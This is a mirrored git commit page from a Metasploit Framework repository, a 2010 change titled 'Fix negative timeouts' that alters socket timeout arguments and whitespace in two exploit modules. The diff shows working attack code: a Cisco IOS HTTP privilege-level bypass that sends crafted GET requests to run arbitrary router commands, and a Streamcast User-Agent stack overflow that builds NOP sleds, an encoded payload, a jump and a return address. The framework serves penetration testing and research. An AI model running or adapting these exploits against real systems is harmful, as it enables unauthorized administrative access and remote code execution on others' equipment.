dnrops
/
metasploit-framework
1
0
Fork 0
Code Issues Pull Requests Packages Projects Releases Wiki Activity

Fix negative timeouts 

git-svn-id: file:///home/svn/framework3/trunk@9048 4d416f70-5f16-0410-b530-b9f4589650da
This commit is contained in:
HD Moore 2010-04-11 13:26:50 +00:00
parent a3e92b2e75
commit ee4528ed86
2 changed files with 17 additions and 16 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

15
modules/auxiliary/admin/cisco/ios_http_auth_bypass.rb
View File

@ -3,7 +3,7 @@
##
##
# This file is part of the Metasploit Framework and may be subject to
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
@ -18,7 +18,7 @@ class Metasploit3 < Msf::Auxiliary
include Msf::Exploit::Remote::Tcp
def initialize(info = {})
super(update_info(info,
super(update_info(info,
'Name' => 'Cisco IOS HTTP Unauthorized Administrative Access',
'Description' => %q{
This module exploits a vulnerability in the Cisco IOS HTTP Server.
@ -44,7 +44,7 @@ class Metasploit3 < Msf::Auxiliary
Opt::RPORT(80),
OptString.new('CMD', [ true, "Cisco IOS command", 'show start' ])
], self.class)
end
def run
@ -56,7 +56,7 @@ class Metasploit3 < Msf::Auxiliary
sploit = "GET /level/" + level.to_s + "/exec/show%20privilege HTTP/1.0\r\n\r\n"
sock.put(sploit)
result = sock.get(-1,-3)
result = sock.get(-1, 3)
disconnect
if (result =~ /Current privilege level is/)
@ -69,7 +69,7 @@ class Metasploit3 < Msf::Auxiliary
sploit = "GET /level/" + level.to_s + "/exec/" + xCMD + " HTTP/1.0\r\n\r\n"
sock.put(sploit)
result = sock.get(-1,-3)
result = sock.get(-1, 3)
print_status(result.to_s)
disconnect
@ -77,7 +77,7 @@ class Metasploit3 < Msf::Auxiliary
end
end
end
end
@ -135,4 +135,5 @@ Example Exploit:
!
[snip]
=end
=end

18
modules/exploits/windows/http/steamcast_useragent.rb
View File

@ -3,7 +3,7 @@
##
##
# This file is part of the Metasploit Framework and may be subject to
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
@ -18,7 +18,7 @@ class Metasploit3 < Msf::Exploit::Remote
include Msf::Exploit::Remote::Tcp
def initialize(info = {})
super(update_info(info,
super(update_info(info,
'Name' => 'Streamcast <= 0.9.75 HTTP User-Agent Buffer Overflow',
'Description' => %q{
This module exploits a stack overflow in Streamcast <= 0.9.75. By sending
@ -38,7 +38,7 @@ class Metasploit3 < Msf::Exploit::Remote
[ 'URL', 'http://aluigi.altervista.org/adv/steamcazz-adv.txt'],
# [ 'BID', '' ], # No entry as yet
],
'Privileged' => false,
'Privileged' => false,
'DefaultOptions' =>
{
'EXITFUNC' => 'thread',
@ -52,7 +52,7 @@ class Metasploit3 < Msf::Exploit::Remote
'DisableNops' => 'True',
},
'Platform' => 'win',
'Targets' =>
'Targets' =>
[
# Tested OK by patrick 20090225
[ 'Windows 2000 Pro English All', { 'Ret' => 0x75022ac4 } ],
@ -61,13 +61,13 @@ class Metasploit3 < Msf::Exploit::Remote
'DisclosureDate' => 'Jan 24 2008',
'DefaultTarget' => 1))
register_options([ Opt::RPORT(8000) ], self)
register_options([ Opt::RPORT(8000) ], self)
end
def check
connect
sock.put("GET / HTTP/1.0\r\n\r\n")
res = sock.get(3, -1)
res = sock.get(-1, 3)
disconnect
if (res =~ /Steamcast\/0.9.75/)
@ -80,9 +80,9 @@ class Metasploit3 < Msf::Exploit::Remote
connect
juju = "GET / HTTP/1.0\r\n"
juju << "User-Agent: " + make_nops(1008 - payload.encoded.length)
juju << payload.encoded + Rex::Arch::X86.jmp_short(6) + make_nops(2)
juju << [ target.ret ].pack('V') + [0xe8, -850].pack('CV')
juju << "User-Agent: " + make_nops(1008 - payload.encoded.length)
juju << payload.encoded + Rex::Arch::X86.jmp_short(6) + make_nops(2)
juju << [ target.ret ].pack('V') + [0xe8, -850].pack('CV')
juju << rand_text_alpha_upper(275)
print_status("Trying target #{target.name}...")